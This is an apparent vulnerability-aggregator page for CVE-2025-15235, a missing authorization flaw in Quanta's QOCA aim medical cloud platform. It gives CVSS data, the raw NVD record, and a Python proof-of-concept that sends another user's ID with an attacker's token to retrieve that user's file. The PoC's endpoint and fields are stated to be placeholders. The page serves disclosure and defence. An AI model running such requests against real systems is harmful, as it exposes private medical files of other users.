Security Vulnerability Report
CVE-2025-15235 CVSS 6.5 MEDIUM

CVE-2025-15235

Published: 2026-01-05 08:15:57
Last Modified: 2026-01-20 21:12:38

Description

QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a Missing Authorization vulnerability, allowing authenticated remote attackers to modify specific network packet parameters, enabling certain system functions to access other users' files.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector (CVSS v3.1, NVD primary metric)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Note: the 6.5 MEDIUM shown on this page is the v3.1 score; the CNA's secondary CVSS v4.0 assessment in the raw data below rates the same issue 7.1 HIGH.

Configurations (Affected Products)

cpe:2.3:a:quantatw:qoca_aim:*:*:*:*:*:*:*:* - VULNERABLE
QOCA aim AI Medical Cloud Platform < 2.7.6 (the fixed version; see versionEndExcluding in the raw data below)
Quanta Computer QOCA aim Medical Cloud Platform (all unpatched versions, i.e. before 2.7.6)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
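# CVE-2025-15235 PoC - QOCA aim AI Medical Cloud Platform Missing Authorization
# This PoC demonstrates accessing other users' files via modified network packet parameters
#
# Root cause (CWE-862 per the advisory record): the server takes the owning
# user from a client-controlled request field instead of deriving it from the
# authenticated session, so any authenticated user can ask for another user's
# file.  The fix is server-side: resolve the principal from the bearer token
# and verify that it owns the requested file before serving it (addressed in
# 2.7.6 according to the advisory's versionEndExcluding).  The endpoint path
# and field names below are illustrative placeholders; the advisory text on
# this page does not name them.

import requests

TARGET_URL = "https://vulnerable-server/qoca-aim/api"
ATTACKER_TOKEN = "attacker_auth_token_here"
TARGET_USER_ID = "victim_user_id_here"

# Seconds before a request is abandoned, so the script does not hang forever
# on a host that accepts the connection but never answers.
REQUEST_TIMEOUT = 10


def exploit_missing_authorization():
    """
    Exploit CVE-2025-15235 by modifying network packet parameters to
    access other users' files without proper authorization.

    Returns:
        bool: True when the server answered HTTP 200 with a ``fileData``
        field for a file owned by ``TARGET_USER_ID`` (authorization check
        missing); False on any other status, on a 200 without
        ``fileData``, or on a connection/parse error.
    """
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json",
    }

    # A legitimately authorized request would carry the caller's own userId
    # (the account the bearer token belongs to).  Here userId names a
    # different account; a correctly patched server must reject this no
    # matter what the body says, because ownership is decided server-side.
    malicious_payload = {
        "action": "getFile",
        "fileId": "victim_file_456",
        "userId": TARGET_USER_ID,  # Unauthorized access to victim's files
    }

    try:
        response = requests.post(
            f"{TARGET_URL}/files",
            headers=headers,
            json=malicious_payload,
            timeout=REQUEST_TIMEOUT,
        )

        if response.status_code != 200:
            print(f"[-] Request failed: {response.status_code}")
            return False

        data = response.json()
        if "fileData" not in data:
            # Explicit False here: the original fell through this case and
            # returned None, so callers could not tell "not vulnerable" from
            # "no result".
            print("[-] Request succeeded but no fileData was returned")
            return False

        print("[+] SUCCESS: Unauthorized file access achieved!")
        print(f"[+] Retrieved file data: {data['fileData']}")
        return True

    except requests.exceptions.RequestException as e:
        print(f"[-] Connection error: {e}")
        return False


if __name__ == "__main__":
    print("CVE-2025-15235 - QOCA aim AI Medical Cloud Platform PoC")
    print("=" * 60)
    exploit_missing_authorization()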

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15235", "sourceIdentifier": "[email protected]", "published": "2026-01-05T08:15:57.237", "lastModified": "2026-01-20T21:12:38.050", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "QOCA aim AI Medical Cloud Platform developed by Quanta Computer has a Missing Authorization vulnerability, allowing authenticated remote attackers to modify specific network packet parameters, enabling certain system functions to access other users' files."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:quantatw:qoca_aim:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.7.6", "matchCriteriaId": "4D325141-836B-4D68-87D4-9E4BD8F2A80F"}]}]}], "references": [{"url": "https://www.twcert.org.tw/en/cp-139-10616-cd942-2.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.twcert.org.tw/tw/cp-132-10615-157a3-1.html", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}